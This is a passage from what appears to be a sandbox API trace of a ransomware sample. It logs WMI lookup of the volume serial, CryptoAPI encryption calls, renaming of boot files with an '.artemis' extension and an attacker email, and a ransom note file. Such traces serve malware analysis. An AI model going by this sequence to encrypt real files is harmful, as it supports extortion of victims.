ppvObject=0x689f174*=0x672099c) returned 0x0 [0144.297] WbemLocator:IUnknown:AddRef (This=0x672099c) returned 0x4 [0144.297] WbemLocator:IUnknown:Release (This=0x672099c) returned 0x3 [0144.343] WbemLocator:IUnknown:Release (This=0x672099c) returned 0x2 [0144.925] SysStringLen (param_1=0x0) returned 0x0 [0144.925] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738540, puCount=0x689f50c | out: puCount=0x689f50c*=0x0) returned 0x0 [0144.925] WbemDefPath:IWbemPath:GetText (in: This=0x6738540, lFlags=2, puBuffLength=0x689f508*=0x0, pszText=0x0 | out: puBuffLength=0x689f508*=0x20, pszText=0x0) returned 0x0 [0144.926] WbemDefPath:IWbemPath:GetText (in: This=0x6738540, lFlags=2, puBuffLength=0x689f508*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x689f508*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0144.926] CoGetContextToken (in: pToken=0x689f178 | out: pToken=0x689f178) returned 0x0 [0144.926] WbemLocator:IUnknown:AddRef (This=0x780b14) returned 0x3 [0144.926] WbemLocator:IUnknown:QueryInterface (in: This=0x780b14, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689f00c | out: ppvObject=0x689f00c*=0x780b14) returned 0x0 [0144.926] WbemLocator:IUnknown:Release (This=0x780b14) returned 0x3 [0144.926] WbemLocator:IUnknown:Release (This=0x780b14) returned 0x2 [0144.926] WbemDefPath:IWbemPath:GetText (in: This=0x6738540, lFlags=2, puBuffLength=0x689f510*=0x0, pszText=0x0 | out: puBuffLength=0x689f510*=0x20, pszText=0x0) returned 0x0 [0144.926] WbemDefPath:IWbemPath:GetText (in: This=0x6738540, lFlags=2, puBuffLength=0x689f510*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x689f510*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0144.926] IWbemServices:GetObject (in: This=0x672099c, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x689f4c4*=0x0, ppCallResult=0x0 | out: ppObject=0x689f4c4*=0x673afa0, ppCallResult=0x0) returned 0x0 [0145.385] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67384d0, puCount=0x689f4c4 | out: puCount=0x689f4c4*=0x2) returned 0x0 [0145.385] WbemDefPath:IWbemPath:GetText (in: This=0x67384d0, lFlags=4, puBuffLength=0x689f4c0*=0x0, pszText=0x0 | out: puBuffLength=0x689f4c0*=0xf, pszText=0x0) returned 0x0 [0145.385] WbemDefPath:IWbemPath:GetText (in: This=0x67384d0, lFlags=4, puBuffLength=0x689f4c0*=0xf, pszText="00000000000000" | out: puBuffLength=0x689f4c0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0145.385] IWbemClassObject:Get (in: This=0x673afa0, wszName="VolumeSerialNumber", lFlags=0, pVal=0x689f4c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3516f68*=0, plFlavor=0x3516f6c*=0 | out: pVal=0x689f4c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3516f68*=8, plFlavor=0x3516f6c*=0) returned 0x0 [0145.385] SysStringByteLen (bstr="9C354B42") returned 0x10 [0145.385] SysStringByteLen (bstr="9C354B42") returned 0x10 [0145.386] IWbemClassObject:Get (in: This=0x673afa0, wszName="VolumeSerialNumber", lFlags=0, pVal=0x689f4c8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3516f68*=8, plFlavor=0x3516f6c*=0 | out: pVal=0x689f4c8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3516f68*=8, plFlavor=0x3516f6c*=0) returned 0x0 [0145.386] SysStringByteLen (bstr="9C354B42") returned 0x10 [0145.386] SysStringByteLen (bstr="9C354B42") returned 0x10 [0145.386] GetFullPathNameW (in: lpFileName="C:\\Boot\\BCD.LOG", nBufferLength=0x105, lpBuffer=0x689f0c8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\BCD.LOG", lpFilePart=0x0) returned 0xf [0145.386] GetFullPathNameW (in: lpFileName="C:\\Boot\\BCD.LOG.id-9C354B42.[khalate@tutanota.com].artemis", nBufferLength=0x105, lpBuffer=0x689f0c8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\BCD.LOG.id-9C354B42.[khalate@tutanota.com].artemis", lpFilePart=0x0) returned 0x3a [0145.386] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f528) returned 1 [0145.386] GetFileAttributesExW (in: lpFileName="C:\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), fInfoLevelId=0x0, lpFileInformation=0x689f5a4 | out: lpFileInformation=0x689f5a4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac2e8a60, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x9098e7a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x5400)) returned 1 [0145.386] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f524) returned 1 [0145.386] MoveFileW (lpExistingFileName="C:\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), lpNewFileName="C:\\Boot\\BCD.LOG.id-9C354B42.[khalate@tutanota.com].artemis" (normalized: "c:\\boot\\bcd.log.id-9c354b42.[khalate@tutanota.com].artemis")) returned 0 [0145.388] GetFullPathNameW (in: lpFileName="C:\\Boot\\BCD.LOG1", nBufferLength=0x105, lpBuffer=0x689f16c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\BCD.LOG1", lpFilePart=0x0) returned 0x10 [0145.388] GetFullPathNameW (in: lpFileName="C:\\Boot\\BCD.LOG1", nBufferLength=0x105, lpBuffer=0x689f164, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\BCD.LOG1", lpFilePart=0x0) returned 0x10 [0145.388] GetFullPathNameW (in: lpFileName="C:\\Boot\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x689f16c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\info-decrypt.hta", lpFilePart=0x0) returned 0x18 [0145.388] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f5cc) returned 1 [0145.388] GetFileAttributesExW (in: lpFileName="C:\\Boot\\info-decrypt.hta" (normalized: "c:\\boot\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x689f648 | out: lpFileInformation=0x689f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe1f09e0, ftCreationTime.dwHighDateTime=0x1d6a20a, ftLastAccessTime.dwLowDateTime=0xfe1f09e0, ftLastAccessTime.dwHighDateTime=0x1d6a20a, ftLastWriteTime.dwLowDateTime=0xfe1f09e0, ftLastWriteTime.dwHighDateTime=0x1d6a20a, nFileSizeHigh=0x0, nFileSizeLow=0x1557)) returned 1 [0145.389] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f5c8) returned 1 [0145.389] GetFullPathNameW (in: lpFileName="C:\\Boot\\BCD.LOG1", nBufferLength=0x105, lpBuffer=0x689f0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\BCD.LOG1", lpFilePart=0x0) returned 0x10 [0145.389] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f594) returned 1 [0145.389] GetFileAttributesExW (in: lpFileName="C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), fInfoLevelId=0x0, lpFileInformation=0x3517648 | out: lpFileInformation=0x3517648*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0145.389] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f590) returned 1 [0145.389] GetFullPathNameW (in: lpFileName="C:\\Boot\\BCD.LOG1", nBufferLength=0x105, lpBuffer=0x689efd4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\BCD.LOG1", lpFilePart=0x0) returned 0x10 [0145.389] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f4c8) returned 1 [0145.389] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3a8 [0145.389] GetFileType (hFile=0x3a8) returned 0x1 [0145.390] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689f4c4) returned 1 [0145.390] GetFileType (hFile=0x3a8) returned 0x1 [0145.390] GetFileSize (in: hFile=0x3a8, lpFileSizeHigh=0x689f5d0 | out: lpFileSizeHigh=0x689f5d0*=0x0) returned 0x0 [0145.390] CloseHandle (hObject=0x3a8) returned 1 [0145.390] CryptAcquireContextW (in: phProv=0x689f51c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x689f51c*=0x6eed18) returned 1 [0145.391] CryptGenRandom (in: hProv=0x6eed18, dwLen=0x10, pbBuffer=0x3517e3c | out: pbBuffer=0x3517e3c) returned 1 [0148.233] CryptImportKey (in: hProv=0x6eed18, pbData=0x351268c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x689f4ec | out: phKey=0x689f4ec*=0x77b0b0) returned 1 [0148.234] CryptContextAddRef (hProv=0x6eed18, pdwReserved=0x0, dwFlags=0x0) returned 1 [0148.234] CryptContextAddRef (hProv=0x6eed18, pdwReserved=0x0, dwFlags=0x0) returned 1 [0148.234] CryptDuplicateKey (in: hKey=0x77b0b0, pdwReserved=0x0, dwFlags=0x0, phKey=0x689f4dc | out: phKey=0x689f4dc*=0x77ac30) returned 1 [0148.234] CryptContextAddRef (hProv=0x6eed18, pdwReserved=0x0, dwFlags=0x0) returned 1 [0148.234] CryptSetKeyParam (hKey=0x77ac30, dwParam=0x4, pbData=0x351276c*=0x1, dwFlags=0x0) returned 1 [0148.234] CryptSetKeyParam (hKey=0x77ac30, dwParam=0x1, pbData=0x3512738, dwFlags=0x0) returned 1 [0148.234] CryptEncrypt (in: hKey=0x77ac30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x351277c*, pdwDataLen=0x689f548*=0x10, dwBufLen=0x10 | out: pbData=0x351277c*, pdwDataLen=0x689f548*=0x10) returned 1 [0148.234] CryptEncrypt (in: hKey=0x77ac30, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x35127b0*, pdwDataLen=0x689f550*=0x0, dwBufLen=0x10 | out: pbData=0x35127b0*, pdwDataLen=0x689f550*=0x10) returned 1 [0148.236] CryptDestroyKey (hKey=0x77b0b0) returned 1 [0148.236] CryptReleaseContext (hProv=0x6eed18, dwFlags=0x0) returned 1 [0148.236] CryptReleaseContext (hProv=0x6eed18, dwFlags=0x0) returned 1 [0148.236] GetFullPathNameW (in: lpFileName="C:\\Boot\\BCD.LOG1", nBufferLength=0x105, lpBuffer=0x689efc0, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\BCD.LOG1", lpFilePart=0x0) returned 0x10 [0148.236] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x689f4b4) returned 1 [0148.236] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0148.238] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x689e2f0) returned 1 [0148.238] CoTaskMemAlloc (cb=0x20c) returned 0x70b7b8 [0148.239] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x70b7b8 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0148.239] CoTaskMemFree (pv=0x70b7b8) [0148.239] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x689efa8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0148.239] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689f4f0 | out: ppv=0x689f4f0*=0x72015c) returned 0x0 [0148.239] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x689f4e8 | out: pAptType=0x689f4e8*=1) returned 0x0 [0148.239] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x689f4ec | out: ppvObject=0x689f4ec*=0x0) returned 0x80004002 [0148.239] IUnknown:Release (This=0x72015c) returned 0x1 [0148.240] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689ee58 | out: ppv=0x689ee58*=0x6736fe8) returned 0x0 [0148.240] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736fe8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x689f070 | out: ppvObject=0x689f070*=0x0) returned 0x80004002 [0148.240] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736fe8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689f084 | out: ppvObject=0x689f084*=0x6738070) returned 0x0 [0148.240] WbemDefPath:IUnknown:Release (This=0x6736fe8) returned 0x0 [0148.241] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738070, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689eca4 | out: ppvObject=0x689eca4*=0x6738070) returned 0x0 [0148.241] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738070, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x689ec60 | out: ppvObject=0x689ec60*=0x0) returned 0x80004002 [0148.241] WbemDefPath:IUnknown:AddRef (This=0x6738070) returned 0x3 [0148.241] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738070, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x689e5bc | out: ppvObject=0x689e5bc*=0x0) returned 0x80004002 [0148.241] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738070, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x689e56c | out: ppvObject=0x689e56c*=0x0) returned 0x80004002 [0148.241] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738070, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689e578 | out: ppvObject=0x689e578*=0x77db98) returned 0x0 [0148.241] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77db98, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x689e580 | out: pCid=0x689e580*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0148.241] WbemDefPath:IUnknown:Release (This=0x77db98) returned 0x3 [0148.241] CoGetContextToken (in: pToken=0x689e5d8 | out: pToken=0x689e5d8) returned 0x0 [0148.241] CoGetContextToken (in: pToken=0x689e9e0 | out: pToken=0x689e9e0) returned 0x0 [0148.241] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738070, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689ea70 | out: ppvObject=0x689ea70*=0x0) returned 0x80004002 [0148.241] WbemDefPath:IUnknown:Release (This=0x6738070) returned 0x2 [0148.241] WbemDefPath:IUnknown:Release (This=0x6738070) returned 0x1 [0148.241] CoGetContextToken (in: pToken=0x689f368 | out: pToken=0x689f368) returned 0x0 [0148.241] CoGetContextToken (in: pToken=0x689f2c8 | out: pToken=0x689f2c8) returned 0x0 [0148.241] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738070, riid=0x689f398*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x689f394 | out: ppvObject=0x689f394*=0x6738070) returned 0x0 [0148.242] WbemDefPath:IUnknown:AddRef (This=0x6738070) returned 0x3 [0148.242] WbemDefPath:IUnknown:Release (This=0x6738070) returned 0x2 [0148.242] WbemDefPath:IWbemPath:SetText (This=0x6738070, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0148.242] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738070, puCount=0x689f51c | out: puCount=0x689f51c*=0x0) returned 0x0 [0148.242] WbemDefPath:IWbemPath:GetText (in: This=0x6738070, lFlags=2, puBuffLength=0x689f518*=0x0, pszText=0x0 | out: puBuffLength=0x689f518*=0x20, pszText=0x0) returned 0x0 [0148.242] WbemDefPath:IWbemPath:GetText (in: This=0x6738070, lFlags=2, puBuffLength=0x689f518*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x689f518*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0148.242] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738070, uRequestedInfo=0x0, puResponse=0x689f524 | out: puResponse=0x689f524*=0xc19) returned 0x0 [0148.242] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738070, puCount=0x689f51c | out: puCount=0x689f51c*=0x0) returned 0x0 [0148.242] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738070, uRequestedInfo=0x0, puResponse=0x689f524 | out: puResponse=0x689f524*=0xc19) returned 0x0 [0148.242] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738070, uRequestedInfo=0x0, puResponse=0x689f524 | out: puResponse=0x689f524*=0xc19) returned 0x0 [0148.242] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738070, puCount=0x689f49c | out: puCount=0x689f49c*=0x0) returned 0x0 [0148.242] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67209c0, puCount=0x689f488 | out: puCount=0x689f488*=0x2) returned 0x0 [0148.242] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x689f484*=0x0, pszText=0x0 | out: puBuffLength=0x689f484*=0xf, pszText=0x0) returned 0x0 [0148.242] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x689f484*=0xf, pszText="00000000000000" | out: puBuffLength=0x689f484*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0148.242] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689f438 | out: ppv=0x689f438*=0x72015c) returned 0x0 [0148.242] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x689f430 | out: pAptType=0x689f430*=1) returned 0x0 [0148.242] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x689f434 | out: ppvObject=0x689f434*=0x0) returned 0x80004002 [0148.242] IUnknown:Release (This=0x72015c) returned 0x1 [0148.367] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689eda0 | out: ppv=0x689eda0*=0x6736eb8) returned 0x0 [0148.367] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736eb8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x689efb8 | out: ppvObject=0x689efb8*=0x0) returned 0x80004002 [0148.368] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736eb8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689efcc | out: ppvObject=0x689efcc*=0x6737f90) returned 0x0 [0148.368] WbemDefPath:IUnknown:Release (This=0x6736eb8) returned 0x0 [0148.368] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737f90, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689ebec | out: ppvObject=0x689ebec*=0x6737f90) returned 0x0 [0148.368] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737f90, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x689eba8 | out: ppvObject=0x689eba8*=0x0) returned 0x80004002 [0148.368] WbemDefPath:IUnknown:AddRef (This=0x6737f90) returned 0x3 [0148.368] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737f90, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x689e504 | out: ppvObject=0x689e504*=0x0) returned 0x80004002 [0148.368] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737f90, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x689e4b4 | out: ppvObject=0x689e4b4*=0x0) returned 0x80004002 [0148.368] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737f90, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689e4c0 | out: ppvObject=0x689e4c0*=0x765188) returned 0x0 [0148.368] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x765188, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x689e4c8 | out: pCid=0x689e4c8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0148.368] WbemDefPath:IUnknown:Release (This=0x765188) returned 0x3 [0148.368] CoGetContextToken (in: pToken=0x689e520 | out: pToken=0x689e520) returned 0x0 [0148.368] CoGetContextToken (in: pToken=0x689e928 | out: pToken=0x689e928) returned 0x0 [0148.368] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737f90, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x689e9b8 | out: ppvObject=0x689e9b8*=0x0) returned 0x80004002 [0148.369] WbemDefPath:IUnknown:Release (This=0x6737f90) returned 0x2 [0148.369] WbemDefPath:IUnknown:Release (This=0x6737f90) returned 0x1 [0148.369] CoGetContextToken (in: pToken=0x689f2b0 | out: pToken=0x689f2b0) returned 0x0 [0148.369] CoGetContextToken (in: pToken=0x689f210 | out: pToken=0x689f210) returned 0x0 [0148.369] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737f90, riid=0x689f2e0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x689f2dc | out: ppvObject=0x689f2dc*=0x6737f90) returned 0x0 [0148.369] WbemDefPath:IUnknown:AddRef (This=0x6737f90) returned 0x3 [0148.369] WbemDefPath:IUnknown:Release (This=0x6737f90) returned 0x2 [0148.369] WbemDefPath:IWbemPath:SetText (This=0x6737f90, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0148.369] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6737f90, puCount=0x689f460 | out: puCount=0x689f460*=0x2) returned 0x0 [0148.369] WbemDefPath:IWbemPath:GetText (in: This=0x6737f90, lFlags=4, puBuffLength=0x689f45c*=0x0, pszText=0x0 | out: puBuffLength=0x689f45c*=0xf, pszText=0x0) returned 0x0 [0148.369] WbemDefPath:IWbemPath:GetText (in: This=0x6737f90, lFlags=4, puBuffLength=0x689f45c*=0xf, pszText="00000000000000" | out: puBuffLength=0x689f45c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0148.369] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x689f460 | out: ppv=0x689f460*=0x72015c) returned 0x0 [0148.369] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x689f458 | out: pAptType=0x689f458*=1) returned 0x0 [0148.370] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, 